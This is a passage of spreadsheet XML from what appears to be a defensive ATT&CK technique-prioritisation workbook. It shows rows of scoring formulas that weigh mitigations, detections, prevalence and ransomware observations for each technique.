        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B164" s="37">
        <f t="shared" si="2"/>
        <v>64.100000000000009</v>
      </c>
      <c r="C164" s="37" t="s">
        <v>592</v>
      </c>
      <c r="D164" s="50" t="s">
        <v>582</v>
      </c>
      <c r="E164" s="37" t="s">
        <v>593</v>
      </c>
      <c r="F164" s="37">
        <v>1</v>
      </c>
      <c r="G164" s="37">
        <v>1</v>
      </c>
      <c r="H164" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I164" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J164" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K164" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L164" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M164" s="37">
        <v>0</v>
      </c>
      <c r="N164" s="56">
        <v>0</v>
      </c>
      <c r="O164" s="56">
        <v>0</v>
      </c>
      <c r="P164" s="56">
        <v>0</v>
      </c>
      <c r="Q164" s="56">
        <v>0</v>
      </c>
      <c r="R164" s="57"/>
      <c r="S164" s="57">
        <v>0</v>
      </c>
      <c r="T164" s="57"/>
      <c r="U164" s="57">
        <v>0</v>
      </c>
      <c r="V164" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W164" s="37">
        <v>0</v>
      </c>
      <c r="X164" s="37">
        <v>0</v>
      </c>
      <c r="Y164" s="37">
        <v>0</v>
      </c>
      <c r="Z164" s="37">
        <v>0</v>
      </c>
      <c r="AA164" s="37">
        <v>0</v>
      </c>
      <c r="AB164" s="37">
        <v>0</v>
      </c>
      <c r="AC164" s="37"/>
      <c r="AD164" s="50" t="s">
        <v>159</v>
      </c>
      <c r="AE164" s="37" t="str" cm="1">
        <f t="array" ref="AE164">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD164)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF164" s="37">
        <v>160</v>
      </c>
      <c r="AG164" s="37" t="str" cm="1">
        <f t="array" ref="AG164">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD164)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH164" s="37">
        <v>160</v>
      </c>
      <c r="AI164" s="37" t="str" cm="1">
        <f t="array" ref="AI164">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD164)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ164" s="37">
        <v>160</v>
      </c>
      <c r="AK164" s="37" t="str" cm="1">
        <f t="array" ref="AK164">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD164)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL164" s="37">
        <v>160</v>
      </c>
      <c r="AM164" s="37" t="str" cm="1">
        <f t="array" ref="AM164">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD164)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN164" s="37">
        <v>0</v>
      </c>
      <c r="AO164" s="37">
        <v>0</v>
      </c>
      <c r="AP164" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ164" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>21.366666666666671</v>
      </c>
      <c r="AR164" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS164" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT164" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU16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65" spans="1:47" ht="17">
      <c r="A165" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B165" s="37">
        <f t="shared" si="2"/>
        <v>165.85711214285715</v>
      </c>
      <c r="C165" s="37" t="s">
        <v>594</v>
      </c>
      <c r="D165" s="50" t="s">
        <v>582</v>
      </c>
      <c r="E165" s="37" t="s">
        <v>595</v>
      </c>
      <c r="F165" s="37">
        <v>1</v>
      </c>
      <c r="G165" s="37">
        <v>1</v>
      </c>
      <c r="H165" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I165" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J165" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K165" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L165" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M165" s="37">
        <v>0</v>
      </c>
      <c r="N165" s="56">
        <v>0</v>
      </c>
      <c r="O165" s="56">
        <v>1</v>
      </c>
      <c r="P165" s="56">
        <v>0</v>
      </c>
      <c r="Q165" s="56">
        <v>0</v>
      </c>
      <c r="R165" s="57" t="s">
        <v>596</v>
      </c>
      <c r="S165" s="57">
        <v>10</v>
      </c>
      <c r="T165" s="57" t="s">
        <v>597</v>
      </c>
      <c r="U165" s="57">
        <v>6</v>
      </c>
      <c r="V165" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.15714280952380952</v>
      </c>
      <c r="W165" s="37">
        <v>16</v>
      </c>
      <c r="X165" s="37">
        <v>0.29090899999999997</v>
      </c>
      <c r="Y165" s="37">
        <v>0.29090899999999997</v>
      </c>
      <c r="Z165" s="37">
        <v>1</v>
      </c>
      <c r="AA165" s="37">
        <v>0.01</v>
      </c>
      <c r="AB165" s="37">
        <v>0.01</v>
      </c>
      <c r="AC165" s="37"/>
      <c r="AD165" s="50" t="s">
        <v>111</v>
      </c>
      <c r="AE165" s="37" t="str" cm="1">
        <f t="array" ref="AE165">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD165)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF165" s="37">
        <v>161</v>
      </c>
      <c r="AG165" s="37" t="str" cm="1">
        <f t="array" ref="AG165">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD165)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH165" s="37">
        <v>161</v>
      </c>
      <c r="AI165" s="37" t="str" cm="1">
        <f t="array" ref="AI165">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD165)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ165" s="37">
        <v>161</v>
      </c>
      <c r="AK165" s="37" t="str" cm="1">
        <f t="array" ref="AK165">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD165)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL165" s="37">
        <v>161</v>
      </c>
      <c r="AM165" s="37" t="str" cm="1">
        <f t="array" ref="AM165">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD165)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN165" s="37">
        <v>0</v>
      </c>
      <c r="AO165" s="37">
        <v>0</v>
      </c>
      <c r="AP165" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ165" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>55.285704047619049</v>
      </c>
      <c r="AR165" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS165" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT165" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU16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66" spans="1:47" ht="51">
      <c r="A166" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B166" s="37">
        <f t="shared" si="2"/>
        <v>903.96437842857131</v>
      </c>
      <c r="C166" s="37" t="s">
        <v>598</v>
      </c>
      <c r="D166" s="50" t="s">
        <v>599</v>
      </c>
      <c r="E166" s="37"/>
      <c r="F166" s="37">
        <v>2</v>
      </c>
      <c r="G166" s="37">
        <v>1</v>
      </c>
      <c r="H166" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.15000000000000002</v>
      </c>
      <c r="I166" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.2</v>
      </c>
      <c r="J166" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.2</v>
      </c>
      <c r="K166" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L166" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M166" s="37">
        <v>1</v>
      </c>
      <c r="N166" s="56">
        <v>0</v>
      </c>
      <c r="O166" s="56">
        <v>11</v>
      </c>
      <c r="P166" s="56">
        <v>1</v>
      </c>
      <c r="Q166" s="56">
        <v>3</v>
      </c>
      <c r="R166" s="57" t="s">
        <v>600</v>
      </c>
      <c r="S166" s="57">
        <v>6</v>
      </c>
      <c r="T166" s="57" t="s">
        <v>601</v>
      </c>
      <c r="U166" s="57">
        <v>12</v>
      </c>
      <c r="V166" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.24285728571428572</v>
      </c>
      <c r="W166" s="37">
        <v>18</v>
      </c>
      <c r="X166" s="37">
        <v>0.32727299999999998</v>
      </c>
      <c r="Y166" s="37">
        <v>0.32727299999999998</v>
      </c>
      <c r="Z166" s="37">
        <v>15</v>
      </c>
      <c r="AA166" s="37">
        <v>0.15</v>
      </c>
      <c r="AB166" s="37">
        <v>0.15</v>
      </c>
      <c r="AC166" s="37"/>
      <c r="AD166" s="50" t="s">
        <v>602</v>
      </c>
      <c r="AE166" s="37" t="str" cm="1">
        <f t="array" ref="AE166">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD166)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF166" s="37">
        <v>162</v>
      </c>
      <c r="AG166" s="37" t="str" cm="1">
        <f t="array" ref="AG166">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD166)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AH166" s="37">
        <v>162</v>
      </c>
      <c r="AI166" s="37" t="str" cm="1">
        <f t="array" ref="AI166">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD166)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ166" s="37">
        <v>162</v>
      </c>
      <c r="AK166" s="37" t="str" cm="1">
        <f t="array" ref="AK166">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD166)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL166" s="37">
        <v>162</v>
      </c>
      <c r="AM166" s="37" t="str" cm="1">
        <f t="array" ref="AM166">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD166)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN166" s="37">
        <v>0</v>
      </c>
      <c r="AO166" s="37">
        <v>0</v>
      </c>
      <c r="AP166" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ166" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>301.32145947619046</v>
      </c>
      <c r="AR166" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS166" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT166" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU16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67" spans="1:47" ht="51">
      <c r="A167" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B167" s="37">
        <f t="shared" si="2"/>
        <v>136.81898542857144</v>
      </c>
      <c r="C167" s="37" t="s">
        <v>603</v>
      </c>
      <c r="D167" s="50" t="s">
        <v>599</v>
      </c>
      <c r="E167" s="37" t="s">
        <v>604</v>
      </c>
      <c r="F167" s="37">
        <v>1</v>
      </c>
      <c r="G167" s="37">
        <v>1</v>
      </c>
      <c r="H167" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I167" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J167" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K167" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L167" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M167" s="37">
        <v>0</v>
      </c>
      <c r="N167" s="56">
        <v>0</v>
      </c>
      <c r="O167" s="56">
        <v>3</v>
      </c>
      <c r="P167" s="56">
        <v>0</v>
      </c>
      <c r="Q167" s="56">
        <v>0</v>
      </c>
      <c r="R167" s="57" t="s">
        <v>134</v>
      </c>
      <c r="S167" s="57">
        <v>2</v>
      </c>
      <c r="T167" s="57" t="s">
        <v>135</v>
      </c>
      <c r="U167" s="57">
        <v>8</v>
      </c>
      <c r="V167" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.10952371428571428</v>
      </c>
      <c r="W167" s="37">
        <v>10</v>
      </c>
      <c r="X167" s="37">
        <v>0.18181800000000001</v>
      </c>
      <c r="Y167" s="37">
        <v>0.18181800000000001</v>
      </c>
      <c r="Z167" s="37">
        <v>3</v>
      </c>
      <c r="AA167" s="37">
        <v>0.03</v>
      </c>
      <c r="AB167" s="37">
        <v>0.03</v>
      </c>
      <c r="AC167" s="37"/>
      <c r="AD167" s="50" t="s">
        <v>602</v>
      </c>
      <c r="AE167" s="37" t="str" cm="1">
        <f t="array" ref="AE167">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD167)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF167" s="37">
        <v>163</v>
      </c>
      <c r="AG167" s="37" t="str" cm="1">
        <f t="array" ref="AG167">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD167)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AH167" s="37">
        <v>163</v>
      </c>
      <c r="AI167" s="37" t="str" cm="1">
        <f t="array" ref="AI167">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD167)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ167" s="37">
        <v>163</v>
      </c>
      <c r="AK167" s="37" t="str" cm="1">
        <f t="array" ref="AK167">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD167)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL167" s="37">
        <v>163</v>
      </c>
      <c r="AM167" s="37" t="str" cm="1">
        <f t="array" ref="AM167">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD167)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN167" s="37">
        <v>0</v>
      </c>
      <c r="AO167" s="37">
        <v>0</v>
      </c>
      <c r="AP167" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ167" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>45.606328476190477</v>
      </c>
      <c r="AR167" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS167" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT167" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU16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68" spans="1:47" ht="51">
      <c r="A168" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="B168" s="37">
        <f t="shared" si="2"/>
        <v>131.39993742857143</v>
      </c>
      <c r="C168" s="37" t="s">
        <v>605</v>
      </c>
      <c r="D168" s="50" t="s">
        <v>599</v>
      </c>
      <c r="E168" s="37" t="s">
        <v>606</v>
      </c>
      <c r="F168" s="37">
        <v>1</v>
      </c>
      <c r="G168" s="37">
        <v>1</v>
      </c>
      <c r="H168" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I168" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J168" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K168" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L168" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M168" s="37">
        <v>0</v>
      </c>
      <c r="N168" s="56">
        <v>0</v>
      </c>
      <c r="O168" s="56">
        <v>1</v>
      </c>
      <c r="P168" s="56">
        <v>0</v>
      </c>
      <c r="Q168" s="56">
        <v>0</v>
      </c>
      <c r="R168" s="57" t="s">
        <v>134</v>
      </c>
      <c r="S168" s="57">
        <v>2</v>
      </c>
      <c r="T168" s="57" t="s">
        <v>135</v>
      </c>
      <c r="U168" s="57">
        <v>8</v>
      </c>
      <c r="V168" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>9.9999904761904762E-2</v>
      </c>
      <c r="W168" s="37">
        <v>10</v>
      </c>
      <c r="X168" s="37">
        <v>0.18181800000000001</v>
      </c>
      <c r="Y168" s="37">
        <v>0.18181800000000001</v>
      </c>
      <c r="Z168" s="37">
        <v>1</v>
      </c>
      <c r="AA168" s="37">
        <v>0.01</v>
      </c>
      <c r="AB168" s="37">
        <v>0.01</v>
      </c>
      <c r="AC168" s="37"/>
      <c r="AD168" s="50" t="s">
        <v>602</v>
      </c>
      <c r="AE168" s="37" t="str" cm="1">
        <f t="array" ref="AE168">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD168)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF168" s="37">
        <v>164</v>
      </c>
      <c r="AG168" s="37" t="str" cm="1">
        <f t="array" ref="AG168">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD168)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AH168" s="37">
        <v>164</v>
      </c>
      <c r="AI168" s="37" t="str" cm="1">
        <f t="array" ref="AI168">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD168)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ168" s="37">
        <v>164</v>
      </c>
      <c r="AK168" s="37" t="str" cm="1">
        <f t="array" ref="AK168">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD168)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL168" s="37">
        <v>164</v>
      </c>
      <c r="AM168" s="37" t="str" cm="1">
        <f t="array" ref="AM168">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD168)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN168" s="37">
        <v>0</v>
      </c>
      <c r="AO168" s="37">
        <v>1</v>
      </c>
      <c r="AP168" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="AQ168" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>43.799979142857147</v>
      </c>
      <c r="AR168" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS168" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT168" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU16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1.0666661700680271</v>
      </c>
    </row>
    <row r="169" spans="1:47" ht="51">
      <c r="A169" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="B169" s="37">
        <f t="shared" si="2"/>
        <v>151.08577723809523</v>
      </c>
      <c r="C169" s="37" t="s">
        <v>607</v>
      </c>
      <c r="D169" s="50" t="s">
        <v>599</v>
      </c>
      <c r="E169" s="37" t="s">
        <v>608</v>
      </c>
      <c r="F169" s="37">
        <v>1</v>
      </c>
      <c r="G169" s="37">
        <v>1</v>
      </c>
      <c r="H169" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I169" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J169" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K169" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
